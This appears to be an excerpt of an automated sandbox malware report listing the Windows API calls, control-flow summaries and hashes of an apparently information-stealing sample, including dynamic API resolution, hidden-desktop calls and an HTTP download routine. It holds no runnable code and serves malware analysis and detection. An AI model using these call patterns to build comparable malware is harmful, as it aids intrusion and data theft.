                              • GetProcAddress.KERNEL32(76210000,00F15088), ref: 003B670D
                              • GetProcAddress.KERNEL32(76210000,00F29070), ref: 003B6726
                              • GetProcAddress.KERNEL32(76210000,00F29028), ref: 003B673E
                              • GetProcAddress.KERNEL32(76210000,00F28FE0), ref: 003B6756
                              • GetProcAddress.KERNEL32(76210000,00F2DDF8), ref: 003B676F
                              • GetProcAddress.KERNEL32(76210000,00F1A658), ref: 003B6787
                              • GetProcAddress.KERNEL32(76210000,00F2DC60), ref: 003B679F
                              • GetProcAddress.KERNEL32(76210000,00F2DC78), ref: 003B67B8
                              • GetProcAddress.KERNEL32(76210000,00F2DC30), ref: 003B67D0
                              • GetProcAddress.KERNEL32(76210000,00F2DD38), ref: 003B67E8
                              • GetProcAddress.KERNEL32(76210000,00F152C8), ref: 003B6801
                              • GetProcAddress.KERNEL32(76210000,00F15248), ref: 003B6819
                              • GetProcAddress.KERNEL32(76210000,00F15268), ref: 003B6831
                              • GetProcAddress.KERNEL32(76210000,00F152E8), ref: 003B684A
                              • GetProcAddress.KERNEL32(76210000,00F2DD80), ref: 003B6862
                              • GetProcAddress.KERNEL32(76210000,00F2DD50), ref: 003B687A
                              • GetProcAddress.KERNEL32(76210000,00F1A608), ref: 003B6893
                              • GetProcAddress.KERNEL32(76210000,00F15308), ref: 003B68AB
                              • GetProcAddress.KERNEL32(76210000,00F2DBD0), ref: 003B68C3
                              • GetProcAddress.KERNEL32(76210000,00F2DEA0), ref: 003B68DC
                              • GetProcAddress.KERNEL32(76210000,00F2DE58), ref: 003B68F4
                              • GetProcAddress.KERNEL32(76210000,00F2DC48), ref: 003B690C
                              • GetProcAddress.KERNEL32(76210000,00F15328), ref: 003B6925
                              • GetProcAddress.KERNEL32(76210000,00F2DEB8), ref: 003B693D
                              • GetProcAddress.KERNEL32(76210000,00F2DE10), ref: 003B6955
                              • GetProcAddress.KERNEL32(76210000,00F2DD68), ref: 003B696E
                              • GetProcAddress.KERNEL32(76210000,00F2DBE8), ref: 003B6986
                              • GetProcAddress.KERNEL32(76210000,00F2DCA8), ref: 003B699E
                              • GetProcAddress.KERNEL32(76210000,00F2DD98), ref: 003B69B7
                              • GetProcAddress.KERNEL32(76210000,00F2DCD8), ref: 003B69CF
                              • GetProcAddress.KERNEL32(76210000,00F2DD08), ref: 003B69E7
                              • GetProcAddress.KERNEL32(76210000,00F2DCF0), ref: 003B6A00
                              • GetProcAddress.KERNEL32(76210000,00F1FD48), ref: 003B6A18
                              • GetProcAddress.KERNEL32(76210000,00F2DC90), ref: 003B6A30
                              • GetProcAddress.KERNEL32(76210000,00F2DD20), ref: 003B6A49
                              • GetProcAddress.KERNEL32(76210000,00F15008), ref: 003B6A61
                              • GetProcAddress.KERNEL32(76210000,00F2DDB0), ref: 003B6A79
                              • GetProcAddress.KERNEL32(76210000,00F15028), ref: 003B6A92
                              • GetProcAddress.KERNEL32(76210000,00F2DDC8), ref: 003B6AAA
                              • GetProcAddress.KERNEL32(76210000,00F2DDE0), ref: 003B6AC2
                              • GetProcAddress.KERNEL32(76210000,00F150C8), ref: 003B6ADB
                              • GetProcAddress.KERNEL32(76210000,00F15048), ref: 003B6AF3
                              • LoadLibraryA.KERNEL32(00F2DC00,003B051F), ref: 003B6B05
                              • LoadLibraryA.KERNEL32(00F2DCC0), ref: 003B6B16
                              • LoadLibraryA.KERNEL32(00F2DE28), ref: 003B6B28
                              • LoadLibraryA.KERNEL32(00F2DE40), ref: 003B6B3A
                              • LoadLibraryA.KERNEL32(00F2DE70), ref: 003B6B4B
                              • LoadLibraryA.KERNEL32(00F2DC18), ref: 003B6B5D
                              • LoadLibraryA.KERNEL32(00F2DE88), ref: 003B6B6F
                              • LoadLibraryA.KERNEL32(00F2E008), ref: 003B6B80
                              • GetProcAddress.KERNEL32(751E0000,00F15068), ref: 003B6B9C
                              • GetProcAddress.KERNEL32(751E0000,00F2DF90), ref: 003B6BB4
                              • GetProcAddress.KERNEL32(751E0000,00F28B78), ref: 003B6BCD
                              • GetProcAddress.KERNEL32(751E0000,00F2DFF0), ref: 003B6BE5
                              • GetProcAddress.KERNEL32(751E0000,00F150E8), ref: 003B6BFD
                              • GetProcAddress.KERNEL32(73940000,00F1A680), ref: 003B6C1D
                              • GetProcAddress.KERNEL32(73940000,00F153A8), ref: 003B6C35
                              • GetProcAddress.KERNEL32(73940000,00F1A6A8), ref: 003B6C4E
                              • GetProcAddress.KERNEL32(73940000,00F2DF18), ref: 003B6C66
                              • GetProcAddress.KERNEL32(73940000,00F2DF60), ref: 003B6C7E
                              • GetProcAddress.KERNEL32(73940000,00F156E8), ref: 003B6C97
                              • GetProcAddress.KERNEL32(73940000,00F153C8), ref: 003B6CAF
                              • GetProcAddress.KERNEL32(73940000,00F2DF00), ref: 003B6CC7
                              • GetProcAddress.KERNEL32(753A0000,00F15588), ref: 003B6CE3
                              • GetProcAddress.KERNEL32(753A0000,00F155A8), ref: 003B6CFB
                              • GetProcAddress.KERNEL32(753A0000,00F2DFC0), ref: 003B6D14
                              • GetProcAddress.KERNEL32(753A0000,00F2DFA8), ref: 003B6D2C
                              • GetProcAddress.KERNEL32(753A0000,00F15368), ref: 003B6D44
                              • GetProcAddress.KERNEL32(76310000,00F1A888), ref: 003B6D64
                              • GetProcAddress.KERNEL32(76310000,00F1A6D0), ref: 003B6D7C
                              • GetProcAddress.KERNEL32(76310000,00F2DFD8), ref: 003B6D95
                              • GetProcAddress.KERNEL32(76310000,00F155C8), ref: 003B6DAD
                              • GetProcAddress.KERNEL32(76310000,00F155E8), ref: 003B6DC5
                              • GetProcAddress.KERNEL32(76310000,00F1A798), ref: 003B6DDE
                              • GetProcAddress.KERNEL32(76910000,00F2E038), ref: 003B6DFE
                              • GetProcAddress.KERNEL32(76910000,00F154A8), ref: 003B6E16
                              • GetProcAddress.KERNEL32(76910000,00F28C38), ref: 003B6E2F
                              • GetProcAddress.KERNEL32(76910000,00F2DF48), ref: 003B6E47
                              • GetProcAddress.KERNEL32(76910000,00F2E050), ref: 003B6E5F
                              • GetProcAddress.KERNEL32(76910000,00F15348), ref: 003B6E78
                              • GetProcAddress.KERNEL32(76910000,00F15608), ref: 003B6E90
                              • GetProcAddress.KERNEL32(76910000,00F2DF78), ref: 003B6EA8
                              • GetProcAddress.KERNEL32(76910000,00F2E020), ref: 003B6EC1
                              • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 003B6ED7
                              • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 003B6EEE
                              • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 003B6F05
                              • GetProcAddress.KERNEL32(75B30000,00F15668), ref: 003B6F21
                              • GetProcAddress.KERNEL32(75B30000,00F2E068), ref: 003B6F39
                              • GetProcAddress.KERNEL32(75B30000,00F2E080), ref: 003B6F52
                              • GetProcAddress.KERNEL32(75B30000,00F2DED0), ref: 003B6F6A
                              • GetProcAddress.KERNEL32(75B30000,00F2DF30), ref: 003B6F82
                              • GetProcAddress.KERNEL32(75670000,00F15628), ref: 003B6F9E
                              • GetProcAddress.KERNEL32(75670000,00F153E8), ref: 003B6FB6
                              • GetProcAddress.KERNEL32(76AC0000,00F156C8), ref: 003B6FD2
                              • GetProcAddress.KERNEL32(76AC0000,00F2DEE8), ref: 003B6FEA
                              • GetProcAddress.KERNEL32(6F4E0000,00F15548), ref: 003B700A
                              • GetProcAddress.KERNEL32(6F4E0000,00F15388), ref: 003B7022
                              • GetProcAddress.KERNEL32(6F4E0000,00F15408), ref: 003B703B
                              • GetProcAddress.KERNEL32(6F4E0000,00F2DAB0), ref: 003B7053
                              • GetProcAddress.KERNEL32(6F4E0000,00F15488), ref: 003B706B
                              • GetProcAddress.KERNEL32(6F4E0000,00F15428), ref: 003B7084
                              • GetProcAddress.KERNEL32(6F4E0000,00F15648), ref: 003B709C
                              • GetProcAddress.KERNEL32(6F4E0000,00F15508), ref: 003B70B4
                              • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003B70CB
                              • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003B70E2
                              • GetProcAddress.KERNEL32(75AE0000,00F2DA68), ref: 003B70FE
                              • GetProcAddress.KERNEL32(75AE0000,00F28B48), ref: 003B7116
                              • GetProcAddress.KERNEL32(75AE0000,00F2D9F0), ref: 003B712F
                              • GetProcAddress.KERNEL32(75AE0000,00F2D948), ref: 003B7147
                              • GetProcAddress.KERNEL32(76300000,00F15448), ref: 003B7163
                              • GetProcAddress.KERNEL32(6E580000,00F2D930), ref: 003B717F
                              • GetProcAddress.KERNEL32(6E580000,00F15688), ref: 003B7197
                              • GetProcAddress.KERNEL32(6E580000,00F2DB28), ref: 003B71B0
                              • GetProcAddress.KERNEL32(6E580000,00F2D900), ref: 003B71C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                              • Instruction ID: d6e7867b91b49e507cc170b5927f16545271cf61b0a008cf66943eeb8dbcdc4f
                              • Opcode Fuzzy Hash: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                              • Instruction Fuzzy Hash: 6B623CB9611E00EFD754DF64EC8DE2637BAF7A87013148919E956E3364DB34A808FB60
                              APIs
                              • lstrlen.KERNEL32(003BCFEC), ref: 003AF1D5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF1F1
                              • lstrlen.KERNEL32(003BCFEC), ref: 003AF1FC
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF215
                              • lstrlen.KERNEL32(003BCFEC), ref: 003AF220
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF239
                              • lstrcpy.KERNEL32(00000000,003C4FA0), ref: 003AF25E
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF28C
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2C0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2F0
                              • lstrlen.KERNEL32(00F14FC8), ref: 003AF315
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                              • Instruction ID: 067b2971872f6a0c37b63b4a941bd8d134e5ac91fb4aad0ced190a8ed6d6b0cf
                              • Opcode Fuzzy Hash: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                              • Instruction Fuzzy Hash: 0CA27F70901A069FCB22DFA9D849E6AB7F4FF55314F1A8079E809DB261DB31DC46CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0013
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B00BD
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B00E1
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B00EC
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0110
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B011B
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B013F
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B015A
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0189
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B0194
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B01C3
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B01CE
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0206
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B0250
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0288
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B059B
                              • lstrlen.KERNEL32(00F15168), ref: 003B05AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B05D7
                              • lstrcat.KERNEL32(00000000,?), ref: 003B05E3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B060E
                              • lstrlen.KERNEL32(00F2F5E0), ref: 003B0625
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B064C
                              • lstrcat.KERNEL32(00000000,?), ref: 003B0658
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0681
                              • lstrlen.KERNEL32(00F15208), ref: 003B0698
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B06C9
                              • lstrcat.KERNEL32(00000000,?), ref: 003B06D5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0706
                              • lstrcpy.KERNEL32(00000000,00F28AF8), ref: 003B074B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B077F
                              • lstrcpy.KERNEL32(00000000,00F2F508), ref: 003B07E7
                              • lstrcpy.KERNEL32(00000000,00F28968), ref: 003B0858
                              • lstrcpy.KERNEL32(00000000,fplugins), ref: 003B08CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B0928
                              • lstrcpy.KERNEL32(00000000,00F28A28), ref: 003B09F8
                                • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392528
                                • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 0039254E
                                • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392577
                              • lstrcpy.KERNEL32(00000000,00F28A98), ref: 003B0ACE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B0B81
                              • lstrcpy.KERNEL32(00000000,00F28A98), ref: 003B0D58
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID: fplugins
                              • API String ID: 2500673778-38756186
                              • Opcode ID: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                              • Instruction ID: 622cf737007ec87097d5021de7db22222cce05a7fd2e52fe4d09b88a3f294d2e
                              • Opcode Fuzzy Hash: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                              • Instruction Fuzzy Hash: 0CE28D71A053418FC736DF29C499BAAFBE0BF88308F5A856DD58D8B652DB30D845CB42

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2234 396c40-396c64 call 392930 2237 396c75-396c97 call 394bc0 2234->2237 2238 396c66-396c6b 2234->2238 2242 396c99 2237->2242 2243 396caa-396cba call 392930 2237->2243 2238->2237 2239 396c6d-396c6f lstrcpy 2238->2239 2239->2237 2244 396ca0-396ca8 2242->2244 2247 396cc8-396cf5 InternetOpenA StrCmpCA 2243->2247 2248 396cbc-396cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 396cfa-396cfc 2247->2249 2250 396cf7 2247->2250 2248->2247 2251 396ea8-396ebb call 392930 2249->2251 2252 396d02-396d22 InternetConnectA 2249->2252 2250->2249 2261 396ec9-396ee0 call 392a20 * 2 2251->2261 2262 396ebd-396ebf 2251->2262 2253 396d28-396d5d HttpOpenRequestA 2252->2253 2254 396ea1-396ea2 InternetCloseHandle 2252->2254 2256 396d63-396d65 2253->2256 2257 396e94-396e9e InternetCloseHandle 2253->2257 2254->2251 2259 396d7d-396dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 396d67-396d77 InternetSetOptionA 2256->2260 2257->2254 2263 396daf-396dd3 call 3b71e0 call 392a20 * 2 2259->2263 2264 396dd4-396de4 call 3b3d90 2259->2264 2260->2259 2262->2261 2265 396ec1-396ec3 lstrcpy 2262->2265 2264->2263 2275 396de6-396de8 2264->2275 2265->2261 2276 396e8d-396e8e InternetCloseHandle 2275->2276 2277 396dee-396e07 InternetReadFile 2275->2277 2276->2257 2277->2276 2279 396e0d 2277->2279 2281 396e10-396e15 2279->2281 2281->2276 2283 396e17-396e3d call 3b7310 2281->2283 2286 396e3f call 392a20 2283->2286 2287 396e44-396e51 call 392930 2283->2287 2286->2287 2291 396e61-396e8b call 392a20 InternetReadFile 2287->2291 2292 396e53-396e57 2287->2292 2291->2276 2291->2281 2292->2291 2293 396e59-396e5b lstrcpy 2292->2293 2293->2291
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00396C6F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396CC2
                              • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396CD5
                              • StrCmpCA.SHLWAPI(?,00F2F930), ref: 00396CED
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00396D15
                              • HttpOpenRequestA.WININET(00000000,GET,?,00F2F4A8,00000000,00000000,-00400100,00000000), ref: 00396D50
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00396D77
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00396D86
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00396DFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00396E5B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00396E7D
                              • InternetCloseHandle.WININET(00000000), ref: 00396E8E
                              • InternetCloseHandle.WININET(?), ref: 00396E98
                              • InternetCloseHandle.WININET(00000000), ref: 00396EA2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00396EC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                              • Instruction ID: 32a4ea8aadd2889ff7ee7939f8349e168157ef850856e37cfeb25a7a878f7235
                              • Opcode Fuzzy Hash: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                              • Instruction Fuzzy Hash: 92818075E12615AFEF21DFA4DC4AFAE77B8AF44700F154058F905EB280DB70AD048B90
                              APIs
                              • lstrlen.KERNEL32(00F14FC8), ref: 003AF315
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF3A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF3C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF47B
                              • lstrcpy.KERNEL32(00000000,00F14FC8), ref: 003AF4BB
                              • lstrcpy.KERNEL32(00000000,00F28B68), ref: 003AF4EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF59E
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF61C
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF64C
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF69A
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AF718
                              • lstrlen.KERNEL32(00F28B58), ref: 003AF746
                              • lstrcpy.KERNEL32(00000000,00F28B58), ref: 003AF771
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF793
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF7E4
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AFA32
                              • lstrlen.KERNEL32(00F28B38), ref: 003AFA60
                              • lstrcpy.KERNEL32(00000000,00F28B38), ref: 003AFA8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AFAAD
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AFAFE
Memory Dump Source
• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                              • Instruction ID: f095f7110ca07cda006a4c8cedfd58fe3c3bdb4c0ec5f536e739f26190f051d4
                              • Opcode Fuzzy Hash: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                              • Instruction Fuzzy Hash: 5AF12B70A01602CFCB26DFA9C848A6AB7F5FF55314B1A81BDD4099B2A1D736DC46CB90

Control-flow Graph (graph image not reproduced)

Function at 0x3a8ca0: StrCmpCA at entry with ExitProcess on one branch (0x3a8cc6); the other branch enters a loop (0x3a8cec-0x3a8edc) whose body at 0x3a8cff fans out to thirteen cases, each either a StrCmpCA comparison or an lstrlen followed by calls to 392a20 and 392930, with an optional lstrcpy at 0x3a8ebb before the function leaves through 392a20 at 0x3a8ee2.
Memory Dump Source
• Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: ec0a53cbfc22ed29d496d9b3d9fcdf8d562d8dff3d014680d5739a53d8a81eb6
                              • Instruction ID: ceaccbe4594265aa5eef4c17cbda29794627e1dbbfb986500b80e5052f78a32d
                              • Opcode Fuzzy Hash: ec0a53cbfc22ed29d496d9b3d9fcdf8d562d8dff3d014680d5739a53d8a81eb6
                              • Instruction Fuzzy Hash: EC517FB1A04B01EFCB229F75DC8CEAB7BF8FB15700B10481DE442D6610DB74D9459BA1

Control-flow Graph (graph image not reproduced)

Function at 0x3b2740: GetWindowsDirectoryA, then GetVolumeInformationA, a loop at 0x3b27ec-0x3b2807, GetProcessHeap and RtlAllocateHeap, wsprintfA on one of the two following branches, and a final call to 3b71e0 at 0x3b285b.
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 003B277B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003A93B6,00000000,00000000,00000000,00000000), ref: 003B27AC
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B280F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2816
                              • wsprintfA.USER32 ref: 003B283B
Memory Dump Source
